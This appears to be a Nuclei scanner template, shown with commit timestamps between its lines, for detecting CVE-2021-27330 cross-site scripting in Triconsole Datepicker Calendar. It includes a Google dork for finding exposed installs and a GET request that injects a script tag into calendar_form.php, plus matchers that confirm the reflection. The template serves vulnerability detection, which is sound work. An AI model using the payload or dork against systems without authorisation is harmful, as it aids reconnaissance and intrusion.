2021-03-01 11:46:14 +00:00
id : CVE-2021-27330
info :
name : Triconsole 3.75 XSS
2022-05-16 17:16:14 +00:00
author : pikpikcu,daffainfo
2021-03-01 11:46:14 +00:00
severity : medium
2022-05-17 07:01:28 +00:00
description : |
Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
reference :
- https://www.exploit-db.com/exploits/49597
- https://nvd.nist.gov/vuln/detail/CVE-2021-27330
2022-05-16 17:16:14 +00:00
metadata :
2022-05-17 07:01:28 +00:00
verified : true
2022-05-16 17:16:14 +00:00
google-dork : intitle:TriConsole.com - PHP Calendar Date Picker
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-27330
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,triconsole,xss
2021-03-01 11:46:14 +00:00
requests :
- method : GET
path :
2022-05-16 17:16:14 +00:00
- '{{BaseURL}}/calendar/calendar_form.php/"><script>alert(document.domain)</script>'
2021-03-01 11:46:14 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-05-16 17:16:14 +00:00
words :
- '<script>alert(document.domain)</script>'
- '<title>TriConsole.com - PHP Calendar Date Picker</title>'
condition : and
2021-03-02 07:06:11 +00:00
- type : word
2022-05-16 17:16:14 +00:00
part : header
2021-03-02 07:06:11 +00:00
words :
- "text/html"
2021-03-01 11:46:14 +00:00
- type : status
status :
- 200